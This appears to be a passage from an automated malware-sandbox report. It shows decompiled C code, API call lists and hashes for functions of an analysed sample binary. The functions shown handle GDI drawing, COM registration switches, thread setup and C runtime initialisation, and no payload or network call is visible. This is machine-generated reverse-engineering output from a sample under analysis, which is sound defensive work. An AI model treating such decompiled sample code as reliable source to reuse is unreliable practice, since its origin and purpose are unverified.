                  • API ID: Menulstrlen$CountCurrentDeleteDirectoryH_prolog3_Item_strcpy_slstrcmpiswprintf
                  • String ID: %d $&%d $1&0 $\
                  • API String ID: 2973701184-2399880791
                  • Opcode ID: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction ID: b6265fcdd1575fe5806665c5d52ca27f8be5779e5917fe7b4e9aef7305b3ac5e
                  • Opcode Fuzzy Hash: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction Fuzzy Hash: 16B1D371A002259FCB20DF65DD80FEAB7B4EF08314F5041AEE55997292DB38AE94CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004234DC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 224windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E004234DC(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t144;
				intOrPtr _t191;
				void* _t196;

				_t194 = __esi;
				_push(0x70);
				E00431A9B(E0044BFF2, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t196 - 0x44)) = 0x45385c;
				 *(_t196 - 0x40) = 0;
				 *((intOrPtr*)(_t196 - 0x3c)) = 0;
				 *((intOrPtr*)(_t196 - 0x38)) = 0;
				 *(_t196 - 4) = 0;
				 *((intOrPtr*)(_t196 - 0x54)) = 0x45385c;
				 *(_t196 - 0x50) = 0;
				 *((intOrPtr*)(_t196 - 0x4c)) = 0;
				 *((intOrPtr*)(_t196 - 0x48)) = 0;
				 *((intOrPtr*)(_t196 - 0x34)) = 0x45385c;
				 *(_t196 - 0x30) = 0;
				 *((intOrPtr*)(_t196 - 0x2c)) = 0;
				 *((intOrPtr*)(_t196 - 0x28)) = 0;
				 *((intOrPtr*)(_t196 - 0x18)) = 0;
				 *((intOrPtr*)(_t196 - 0x1c)) = 0x4502c8;
				_t191 = 0x452f4c;
				 *((intOrPtr*)(_t196 - 0x20)) = 0;
				 *((intOrPtr*)(_t196 - 0x24)) = 0x452f4c;
				 *(_t196 - 4) = 4;
				if(E0040876B(_t196 - 0x44, 0) != 0 && E0040876B(_t196 - 0x54, 0) != 0 && E0040876B(_t196 - 0x34, 0) != 0 && GetObjectA( *( *((intOrPtr*)(_t196 + 8)) + 4), 0x18, _t196 - 0x7c) != 0) {
					E004230B1( *((intOrPtr*)(_t196 + 0xc)));
					if(E004230ED( *((intOrPtr*)(_t196 + 0xc)),  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x6c) & 0x0000ffff,  *(_t196 - 0x6a) & 0x0000ffff, 0) != 0) {
						_t194 = 1;
						E00423059(0, _t196 - 0x1c, 0x452f4c, CreateBitmap(8, 8, 1, 1, 0x453a54));
						E004230C7(_t196 - 0x24, _t196 - 0x1c);
						E004230B1(_t196 - 0x1c);
						E004230ED(_t196 - 0x1c,  *(_t196 - 0x78),  *(_t196 - 0x74), 1, 1, 0);
						 *((intOrPtr*)(_t196 + 8)) = E00408791(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
						_t137 = E00408791(_t196 - 0x54, _t196 - 0x1c);
						 *((intOrPtr*)(_t196 - 0x14)) = _t137;
						if( *((intOrPtr*)(_t196 + 8)) != 0 && _t137 != 0) {
							_t139 = E004224D1(GetPixel( *(_t196 - 0x40), 0, 0), _t196 - 0x44, _t138);
							_t194 = BitBlt;
							 *((intOrPtr*)(_t196 - 0x10)) = _t139;
							E004224D1(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xcc0020), _t196 - 0x44, 0xffffff);
							E004224D1(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xee0086), _t196 - 0x44,  *((intOrPtr*)(_t196 - 0x10)));
							_t144 = E00408791(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
							 *((intOrPtr*)(_t196 + 0xc)) = _t144;
							_t205 = _t144;
							if(_t144 != 0) {
								 *((intOrPtr*)(_t196 + 0x14)) = E004224D1(E004225CC(_t144, _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x10))), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
								 *(_t196 - 0x5c) =  *(_t196 - 0x78);
								 *(_t196 - 0x58) =  *(_t196 - 0x74);
								 *((intOrPtr*)(_t196 - 0x64)) = 0;
								 *((intOrPtr*)(_t196 - 0x60)) = 0;
								E004224D1(E004225CC(E00419315(_t196 - 0x34, _t196 - 0x64, _t196 - 0x24), _t196 - 0x34, _t148), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x50), 0, 0, 0x8800c6);
								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
								_t191 = 0x452f4c;
							}
							E00408791(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
							E00408791(_t196 - 0x54,  *((intOrPtr*)(_t196 - 0x14)));
							E00408791(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
						}
					}
				}
				 *(_t196 - 4) = 3;
				 *((intOrPtr*)(_t196 - 0x24)) = _t191;
				E0040ADD4(0, _t196 - 0x24, _t191, _t194, _t205);
				 *(_t196 - 4) = 2;
				 *((intOrPtr*)(_t196 - 0x1c)) = 0x4502c8;
				E0040ADD4(0, _t196 - 0x1c, _t191, _t194, _t205);
				 *(_t196 - 4) = 1;
				E00422E06(_t196 - 0x34);
				 *(_t196 - 4) = 0;
				E00422E06(_t196 - 0x54);
				 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
				return E00431B73(E00422E06(_t196 - 0x44));
			}








                  0x004234dc
                  0x004234dc
                  0x004234e3
                  0x004234ef
                  0x004234f2
                  0x004234f5
                  0x004234f8
                  0x004234fb
                  0x004234fe
                  0x00423501
                  0x00423504
                  0x00423507
                  0x0042350a
                  0x0042350d
                  0x00423510
                  0x00423513
                  0x00423516
                  0x00423519
                  0x00423520
                  0x00423525
                  0x00423528
                  0x0042352f
                  0x0042353a
                  0x0042357f
                  0x0042359f
                  0x004235ac
                  0x004235bd
                  0x004235c9
                  0x004235d1
                  0x004235e2
                  0x004235f2
                  0x004235fc
                  0x00423601
                  0x00423607
                  0x00423624
                  0x00423629
                  0x00423639
                  0x00423651
                  0x00423673
                  0x0042367e
                  0x00423683
                  0x00423686
                  0x00423688
                  0x004236a6
                  0x004236ac
                  0x004236b2
                  0x004236c0
                  0x004236c3
                  0x004236da
                  0x004236f5
                  0x0042370c
                  0x0042371f
                  0x00423721
                  0x00423721
                  0x0042372c
                  0x00423737
                  0x00423742
                  0x00423742
                  0x00423607
                  0x0042359f
                  0x0042374a
                  0x0042374e
                  0x00423751
                  0x00423759
                  0x0042375d
                  0x00423764
                  0x0042376c
                  0x00423770
                  0x00423778
                  0x0042377b
                  0x00423780
                  0x00423791

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004234E3
                    • Part of subcall function 0040876B: CreateCompatibleDC.GDI32(?), ref: 0040877E
                  • GetObjectA.GDI32(00000004,00000018,?), ref: 0042356E
                    • Part of subcall function 004230ED: CreateBitmap.GDI32(?,?,?,?,?), ref: 00423104
                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00453A54), ref: 004235B3
                    • Part of subcall function 004230C7: CreatePatternBrush.GDI32(?), ref: 004230DA
                    • Part of subcall function 004230B1: DeleteObject.GDI32(00000000), ref: 004230C0
                  • GetPixel.GDI32(?,00000000,00000000), ref: 0042361A
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224EF
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224FC
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423647
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 0042366B
                    • Part of subcall function 004225CC: SetTextColor.GDI32(?,?), ref: 004225EA
                    • Part of subcall function 004225CC: SetTextColor.GDI32(?,?), ref: 004225F7
                    • Part of subcall function 00419315: FillRect.USER32 ref: 0041932B
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 004236F5
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 0042370C
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0042371F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ColorCreate$BitmapObjectText$BrushCompatibleDeleteFillH_prolog3PatternPixelRect
                  • String ID: L/E$L/E$\8E
                  • API String ID: 3432338323-1579667955
                  • Opcode ID: dadb1abdf5835a7780b6851555df14feb24c5829929af802011495c8ec1e7c59
                  • Instruction ID: 6f4b3f876875d9ea7b1f9b928250c836160261c2eb40080eca9ba127405d88d3
                  • Opcode Fuzzy Hash: dadb1abdf5835a7780b6851555df14feb24c5829929af802011495c8ec1e7c59
                  • Instruction Fuzzy Hash: FE9103B1D0011DAEDF11EFE2DE819EEBBB9FF08348F60402AB505A2161DB395E15DB24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00415151, Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 123stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00415151(void* __ecx, CHAR* _a4) {
				int _t14;
				int _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				CHAR* _t24;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;

				_t24 = _a4;
				_t47 = __ecx;
				_t14 = lstrcmpA(_t24, "pt");
				if(_t14 == 0) {
					 *((intOrPtr*)(_t47 + 0x14)) = 3;
					return _t14;
				}
				_t15 = lstrcmpA(_t24, "p");
				if(_t15 == 0) {
					 *((intOrPtr*)(_t47 + 0x14)) = 2;
					return _t15;
				}
				_t16 = E0040D6F3(_t24, "Register");
				if(_t16 == 0) {
					L22:
					 *((intOrPtr*)(_t47 + 0x14)) = 5;
					return _t16;
				}
				_t16 = E0040D6F3(_t24, "Regserver");
				if(_t16 == 0) {
					goto L22;
				}
				_t16 = E0040D6F3(_t24, "RegisterPerUser");
				if(_t16 == 0) {
					L21:
					 *((intOrPtr*)(_t47 + 0x10)) = 1;
					goto L22;
				}
				_t16 = E0040D6F3(_t24, "RegserverPerUser");
				if(_t16 == 0) {
					goto L21;
				}
				_t17 = E0040D6F3(_t24, "Unregister");
				if(_t17 == 0) {
					L20:
					 *((intOrPtr*)(_t47 + 0x14)) = 6;
					return _t17;
				}
				_t17 = E0040D6F3(_t24, "Unregserver");
				if(_t17 == 0) {
					goto L20;
				}
				_t18 = E0040D6F3(_t24, "UnregisterPerUser");
				if(_t18 == 0) {
					L19:
					 *((intOrPtr*)(_t47 + 0x14)) = 6;
					 *((intOrPtr*)(_t47 + 0x10)) = 1;
					return _t18;
				}
				_t18 = E0040D6F3(_t24, "UnregserverPerUser");
				_pop(_t41);
				if(_t18 == 0) {
					goto L19;
				}
				if(lstrcmpA(_t24, "dde") == 0) {
					_t23 = E00423E10(_t41, _t19);
					 *((intOrPtr*)(_t47 + 0x14)) = 4;
					return _t23;
				}
				_t20 = E0040D6F3(_t24, "Embedding");
				_pop(_t43);
				if(_t20 == 0) {
					_t22 = E00423E10(_t43, _t20);
					 *((intOrPtr*)(_t47 + 8)) = 1;
					L16:
					 *(_t47 + 4) =  *(_t47 + 4) & 0x00000000;
					return _t22;
				}
				_t21 = E0040D6F3(_t24, "Automation");
				_pop(_t45);
				if(_t21 == 0) {
					_t22 = E00423E10(_t45, _t21);
					 *((intOrPtr*)(_t47 + 0xc)) = 1;
					goto L16;
				}
				return _t21;
			}

















                  0x00415157
                  0x00415168
                  0x0041516a
                  0x0041516e
                  0x00415170
                  0x00000000
                  0x00415170
                  0x00415182
                  0x00415186
                  0x00415188
                  0x00000000
                  0x00415188
                  0x0041519a
                  0x004151a3
                  0x004152b3
                  0x004152b3
                  0x00000000
                  0x004152b3
                  0x004151af
                  0x004151b8
                  0x00000000
                  0x00000000
                  0x004151c4
                  0x004151cd
                  0x004152ac
                  0x004152ac
                  0x00000000
                  0x004152ac
                  0x004151d9
                  0x004151e2
                  0x00000000
                  0x00000000
                  0x004151ee
                  0x004151f7
                  0x004152a3
                  0x004152a3
                  0x00000000
                  0x004152a3
                  0x00415203
                  0x0041520c
                  0x00000000
                  0x00000000
                  0x00415218
                  0x00415221
                  0x00415293
                  0x00415293
                  0x0041529a
                  0x00000000
                  0x0041529a
                  0x00415229
                  0x0041522f
                  0x00415232
                  0x00000000
                  0x00000000
                  0x0041523e
                  0x00415241
                  0x00415246
                  0x00000000
                  0x00415246
                  0x00415255
                  0x0041525b
                  0x0041525e
                  0x00415261
                  0x00415266
                  0x0041526d
                  0x0041526d
                  0x00000000
                  0x0041526d
                  0x00415279
                  0x0041527f
                  0x00415282
                  0x00415285
                  0x0041528a
                  0x00000000
                  0x0041528a
                  0x004152be

                  APIs
                  • lstrcmpA.KERNEL32(?,00451CF8), ref: 0041516A
                  • lstrcmpA.KERNEL32(?,00451CF4), ref: 00415182
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp
                  • String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde
                  • API String ID: 1534048567-3876351261
                  • Opcode ID: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction ID: bacbe481972acab002e41af3f2ad9a35167e3d19faef8bf490c2dd1adb14a177
                  • Opcode Fuzzy Hash: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction Fuzzy Hash: C231C373544F02A5E2246E76ED02BD722DC6B5176AF20081FF806A66C3DFFED588496C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416443, Relevance: 21.1, APIs: 14, Instructions: 99synchronizationthreadinjectionCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00416443(intOrPtr __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				void* _t59;
				void* _t60;
				intOrPtr _t64;

				_t59 = __edx;
				_t64 = __ecx;
				_t69 =  *((intOrPtr*)(__ecx + 0x2c));
				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					E00406436(0, __ecx, _t60, __ecx, _t69);
				}
				E00431160(_t60,  &_v32, 0, 0x1c);
				_v32 = E0041EDAB(0, _t60, _t64, _t69);
				_v28 = _t64;
				_v16 = CreateEventA(0, 1, 0, 0);
				_v12 = CreateEventA(0, 1, 0, 0);
				_t37 = _a4;
				_v24 = _a4;
				if(_v16 == 0) {
					L12:
					__eflags = _v12;
					if(_v12 == 0) {
						goto L14;
					}
					goto L13;
				} else {
					if(_v12 == 0) {
						CloseHandle(_v16);
						goto L12;
					}
					_t43 = E00433E25(_t59, _t64, _a12, _a8, E00416327,  &_v32, _t37 | 0x00000004, _t64 + 0x30);
					 *(_t64 + 0x2c) = _t43;
					if(_t43 != 0) {
						ResumeThread(_t43);
						WaitForSingleObject(_v16, 0xffffffff);
						CloseHandle(_v16);
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							SuspendThread( *(_t64 + 0x2c));
						}
						__eflags = _v8;
						if(_v8 == 0) {
							SetEvent(_v12);
							return 1;
						} else {
							WaitForSingleObject( *(_t64 + 0x2c), 0xffffffff);
							CloseHandle( *(_t64 + 0x2c));
							 *(_t64 + 0x2c) = 0;
							L13:
							CloseHandle(_v12);
							L14:
							return 0;
						}
					}
					CloseHandle(_v16);
					CloseHandle(_v12);
					goto L14;
				}
			}

















                  0x00416443
                  0x0041644d
                  0x00416452
                  0x00416455
                  0x00416457
                  0x00416457
                  0x00416463
                  0x0041647b
                  0x0041647e
                  0x00416488
                  0x00416493
                  0x00416496
                  0x00416499
                  0x0041649f
                  0x0041653b
                  0x0041653b
                  0x0041653e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004164a5
                  0x004164a8
                  0x00416539
                  0x00000000
                  0x00416539
                  0x004164c5
                  0x004164cd
                  0x004164d2
                  0x004164e3
                  0x004164ee
                  0x004164fd
                  0x004164ff
                  0x00416503
                  0x00416508
                  0x00416508
                  0x0041650e
                  0x00416511
                  0x0041652b
                  0x00000000
                  0x00416513
                  0x00416518
                  0x00416521
                  0x00416523
                  0x00416540
                  0x00416543
                  0x00416545
                  0x00000000
                  0x00416545
                  0x00416511
                  0x004164d9
                  0x004164de
                  0x00000000
                  0x004164de

                  APIs
                  • _memset.LIBCMT ref: 00416463
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00416481
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041648B
                  • CloseHandle.KERNEL32(?), ref: 004164D9
                  • CloseHandle.KERNEL32(?), ref: 004164DE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ResumeThread.KERNEL32(00000000), ref: 004164E3
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004164EE
                  • CloseHandle.KERNEL32(?), ref: 004164FD
                  • SuspendThread.KERNEL32(?), ref: 00416508
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00416518
                  • CloseHandle.KERNEL32(?), ref: 00416521
                  • SetEvent.KERNEL32(00000004), ref: 0041652B
                  • CloseHandle.KERNEL32(?), ref: 00416543
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseHandle$Event$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                  • String ID:
                  • API String ID: 2577798173-0
                  • Opcode ID: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction ID: 0ba4b3701773fc9ac83d28f7e8eab003c92724f4a67e4e5f2fa9819084e5fd14
                  • Opcode Fuzzy Hash: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction Fuzzy Hash: 24316E72C00209BFDB11AFA5DC848AEBBBAFF48354F11857AF911A2160D7359A819F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00436018, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E00436018(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x45e180);
				E00431818(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0043392F(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x456080;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x463620;
				E0043A0BF(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E004360ED();
				E0043A0BF(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x463c28; // 0x24310f8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00439086( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0043185D(E004360F6());
			}








                  0x00436018
                  0x00436018
                  0x0043601a
                  0x0043601f
                  0x00436024
                  0x0043602a
                  0x00436032
                  0x00436035
                  0x0043603a
                  0x0043603b
                  0x0043603e
                  0x00436041
                  0x0043604b
                  0x00436050
                  0x00436058
                  0x00436060
                  0x00436070
                  0x00436070
                  0x00436076
                  0x00436079
                  0x00436080
                  0x00436087
                  0x00436090
                  0x00436096
                  0x0043609d
                  0x004360a3
                  0x004360aa
                  0x004360b1
                  0x004360b7
                  0x004360ba
                  0x004360bd
                  0x004360c2
                  0x004360c4
                  0x004360c9
                  0x004360c9
                  0x004360cf
                  0x004360d5
                  0x004360e6

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0045E180,0000000C,00436153,00000000,00000000,?,?,38A11573), ref: 0043602A
                  • __crt_waiting_on_module_handle.LIBCMT ref: 00436035
                    • Part of subcall function 0043392F: Sleep.KERNEL32(000003E8,00000000,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,38A11573), ref: 0043393B
                    • Part of subcall function 0043392F: GetModuleHandleW.KERNEL32(?,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,38A11573), ref: 00433944
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0043605E
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0043606E
                  • __lock.LIBCMT ref: 00436090
                  • InterlockedIncrement.KERNEL32(00463620), ref: 0043609D
                  • __lock.LIBCMT ref: 004360B1
                  • ___addlocaleref.LIBCMT ref: 004360CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: 6F$DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-1974163033
                  • Opcode ID: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction ID: e4dbea44d3e701bfa2a05fd5f39e00ef826fe1f2e1bb3cd6cc1662b80f67c0e6
                  • Opcode Fuzzy Hash: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction Fuzzy Hash: 4311A271940B01AAD724EF76D802B5EBBF0EF09315F10952FE899973A1CB789A448F1D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042D2AB, Relevance: 19.8, APIs: 13, Instructions: 260COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0042D2AB(void* __ecx, struct tagSIZE* _a4, int* _a8, CHAR* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
				int _v8;
				signed int _v12;
				signed int _v16;
				int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _v32;
				int _v36;
				signed int _v40;
				signed int _v44;
				struct tagSIZE _v52;
				struct tagPOINT _v60;
				struct tagSIZE _v68;
				struct tagTEXTMETRICA _v124;
				struct tagTEXTMETRICA _v180;
				void* __edi;
				signed int _t126;
				signed int _t127;
				int _t128;
				signed int* _t130;
				signed int _t136;
				char _t137;
				int _t145;
				CHAR* _t147;
				int _t161;
				signed int _t165;
				int _t166;
				signed int _t170;
				signed short _t177;
				CHAR* _t183;
				struct tagSIZE* _t184;
				int* _t187;
				signed int _t189;
				void* _t191;
				int _t196;
				int _t203;
				signed int _t205;
				void* _t211;
				int* _t215;

				_t211 = __ecx;
				GetTextMetricsA( *(__ecx + 8),  &_v124);
				GetTextMetricsA( *(__ecx + 4),  &_v180);
				GetTextExtentPoint32A( *(__ecx + 8), 0x454db8, 1, _a4);
				_t126 = GetTextAlign( *(__ecx + 8));
				_v44 = _t126;
				_t127 = _t126 & 0x00000001;
				_v40 = _t127;
				if(_t127 == 0) {
					_t187 = _a8;
				} else {
					GetCurrentPositionEx( *(__ecx + 4),  &_v60);
					_t187 = _a8;
					 *_t187 = _v60.x;
				}
				_t183 = _a12;
				_t128 =  *_t187;
				_v16 = _v16 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_t215 = _a40;
				_v32 = _t183;
				_v36 = _t128;
				_a12 = _t128;
				if(_a20 != 0) {
					if(_a24 != 1) {
						_t177 = GetTabbedTextExtentA( *(_t211 + 8), 0x454db4, 1, 0, 0);
						_t187 = _a8;
						_v24 = _t177 & 0x0000ffff;
						_t128 = _a12;
					} else {
						_v24 =  *_a28;
					}
				}
				_t203 = _a16;
				_v12 = _v12 & 0x00000000;
				if( *_t203 <= 0) {
					L37:
					_t184 = _a4;
					_t184->cx = _t128 -  *_t187;
					_t130 = _a44;
					 *_t130 =  *_t130 & 0x00000000;
					_t205 = _v44 & 0x00000006;
					if(_t205 != 0) {
						if(_t205 != 6) {
							if(_t205 == 2) {
								 *_t130 = _v16;
							}
							L44:
							if(_v40 != 0) {
								MoveToEx( *(_t211 + 4),  *_t187, _v60.y, 0);
							}
							 *_a16 = _t215 - _a40 >> 2;
							return _t184;
						}
						asm("cdq");
						_t136 = _v16 - _t205 >> 1;
						L41:
						 *_t187 =  *_t187 + _t136;
						goto L44;
					}
					_t136 = _v16;
					goto L41;
				} else {
					_v8 = 1;
					do {
						_t137 =  *_t183;
						_t189 = 0 | _t137 == _v124.tmBreakChar;
						_v28 = _t189;
						if(_t189 != 0 || _a20 != _t189 && _t137 == 9) {
							GetTextExtentPoint32A( *(_t211 + 8), _v32, _v28 - _v32 + _t183,  &_v68);
							_t145 = _v68.cx - _v124.tmOverhang + _v36;
							if(_v28 == 0) {
								_t145 = E0042CDE8(_t189, _t145, _a24, _a28, _a32, _v24);
							}
							_t191 = _t145 - _a12;
							if(_t215 != _a40) {
								 *((intOrPtr*)(_t215 - 4)) =  *((intOrPtr*)(_t215 - 4)) + _t191;
							} else {
								_v16 = _v16 + _t191;
							}
							_a12 = _t145;
							_v36 = _t145;
							_v32 =  &(_t183[1]);
						} else {
							if(E00434A02(_t137) == 0 || _v8 >=  *_a16) {
								GetCharWidthA( *(_t211 + 4),  *_t183 & 0x000000ff,  *_t183 & 0x000000ff,  &_v20);
								if(GetCharWidthA( *(_t211 + 8),  *_t183 & 0x000000ff,  *_t183 & 0x000000ff, _t215) != 0) {
									goto L23;
								}
								goto L21;
							} else {
								if(GetTextExtentPointA( *(_t211 + 4), _t183, 2,  &_v52) == 0) {
									_t170 = _v180.tmAveCharWidth;
								} else {
									asm("cdq");
									_t170 = _v52.cx - _t203 >> 1;
								}
								_v20 = _t170;
